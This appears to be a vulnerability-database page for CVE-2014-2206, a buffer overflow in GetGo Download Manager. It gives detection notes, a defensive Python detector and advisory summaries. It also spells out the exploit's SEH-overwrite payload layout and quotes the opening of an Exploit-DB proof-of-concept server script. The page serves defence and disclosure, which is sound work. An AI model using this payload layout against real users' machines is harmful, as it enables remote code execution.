CVE-2014-2206
Published 2014-03-05
Priority P269 · critical · 10 (CVSS 2.0)
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS 61.44% (99.1th percentile)
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgosoft | getgo_download_manager | <= 4.4.5.502 | — |
| getgosoft | getgo_download_manager | — | — |
| getgosoft | getgo_download_manager | — | — |
Detection & IOCs (extracted from sources)
bytes: \x90 * 4107 (junk) + \x90\x90\xEB\x06 (nseh) + \x00\x28\x0b\x0b (seh) + \x90 * 50 (nops)
- The exploit triggers via a malicious HTTP response: the overflow is embedded in the HTTP status line (HTTP/1.1 200 <oversized payload>). Detect anomalously large HTTP response status lines (>4000 bytes) served to GetGo Download Manager clients.
- The SEH overwrite uses address 0x00280b0b (call dword ptr ss:[ebp+30]) sourced from outside loaded modules to bypass SafeSEH. Look for SEH chain overwrites pointing to this address in crash dumps or memory forensics.
- The overflow requires exactly 4107 bytes of padding before the nSEH/SEH overwrite. Network signatures should flag HTTP responses whose status-reason phrase exceeds ~4100 bytes.
- The attack vector is a victim downloading a file from an attacker-controlled server. Monitor GetGo Download Manager process network connections to untrusted HTTP servers, especially those returning oversized response headers.
- The nSEH short-jump sequence \x90\x90\xEB\x06 followed by the 4-byte SEH value \x0b\x0b\x28\x00 is a distinctive byte pattern detectable in HTTP response traffic via IDS/IPS signatures.
- The PoC exploit was tested only on Windows XP SP3 (German locale). The hardcoded SEH gadget address (0x00280b0b) is environment-specific and may not be valid on other OS versions or patch levels.
- The Metasploit module covers a broader version range (up to 5.3.0.2712) than the PoC (4.9.0.1982). Detection rules should account for all affected versions: 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier.
- All loaded modules in the tested environment are SafeSEH-enabled; the exploit specifically sources its SEH gadget from outside loaded modules to bypass this protection. Environments with different module layouts will require a different gadget address.
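The status-line length and byte-pattern checks from the notes above, as an added example (not code from the advisory, the PoC or any listed source): a Python function that inspects the first bytes of a server-to-client HTTP stream, including the case where the status line has not been terminated yet. The function name, finding labels and sample inputs are this example's own; the 4000-byte limit and the marker bytes are the values quoted in the notes.

```python
import re

# Values below come from the page's detection notes; names are this example's own.
MAX_STATUS_LINE = 4000                             # page: status lines > 4000 bytes
SEH_MARKER = b"\x90\x90\xeb\x06\x0b\x0b\x28\x00"   # page: nSEH jump + SEH value
STATUS_RE = re.compile(rb"HTTP/\d\.\d \d{3}(?: (.*))?", re.DOTALL)


def inspect_response(data: bytes, limit: int = MAX_STATUS_LINE) -> list:
    """Return findings for the first bytes of a server-to-client HTTP stream."""
    end = data.find(b"\n")
    line = (data if end == -1 else data[:end]).rstrip(b"\r")
    findings = []
    if len(line) > limit:
        # Also fires when no line terminator has arrived yet but the
        # buffered status line is already past the limit.
        findings.append("oversized-status-line")
    elif end == -1:
        return ["incomplete"]  # caller should buffer more bytes and retry
    match = STATUS_RE.fullmatch(line)
    if match is None:
        findings.append("malformed-status-line")
    else:
        reason = match.group(1) or b""
        # A legitimate reason phrase is short printable text.
        if any(b < 0x20 or b > 0x7E for b in reason):
            findings.append("binary-reason-phrase")
    if SEH_MARKER in line:
        findings.append("seh-overwrite-marker")
    return findings


if __name__ == "__main__":
    # Constructed sample inputs, not captured traffic.
    samples = {
        "benign": b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n",
        "long reason": b"HTTP/1.1 200 " + b"A" * 4200 + b"\r\n\r\n",
        "partial read": b"HTTP/1.1 2",
    }
    for name, raw in samples.items():
        print(name, inspect_response(raw))
```
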
VulDB
Getgosoft GetGo Download Manager up to 4.4.5.502 memory corruption (EDB-32132 / ID 121824)
vuldb·2026-05-07·CVSS 10.0
CVE-2014-2206 [CRITICAL] Getgosoft GetGo Download Manager up to 4.4.5.502 memory corruption (EDB-32132 / ID 121824)
A vulnerability was found in Getgosoft GetGo Download Manager up to 4.4.5.502. It has been classified as critical. Impacted is an unknown function. The manipulation leads to memory corruption.
This vulnerability is listed as CVE-2014-2206. The attack may be initiated remotely. In addition, an exploit is available.
GHSA
GHSA-836x-hw9m-wqxh: Stack-based buffer overflow in GetGo Download Manager 4
ghsa_unreviewed·2022-05-14
CVE-2014-2206 [HIGH] CWE-119 GHSA-836x-hw9m-wqxh: Stack-based buffer overflow in GetGo Download Manager 4
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.
No detection rules found.
Exploit-DB
GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
exploitdb·2014-03-09·CVSS 10.0
CVE-2014-2206 [CRITICAL] GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection
Metasploit
GetGo Download Manager HTTP Response Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow vulnerability in GetGo Download Manager version 5.3.0.2712 and earlier, caused by an overly long HTTP response header. By persuading the victim to download a file from a malicious server, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.
No writeups or analysis indexed.
http://www.rcesecurity.com/2014/03/cve-2014-2206-getgo-download-manager-http-response-header-buffer-overflow-remote-code-execution
http://www.securityfocus.com/archive/1/531326/100/0/threaded
http://www.securityfocus.com/bid/65913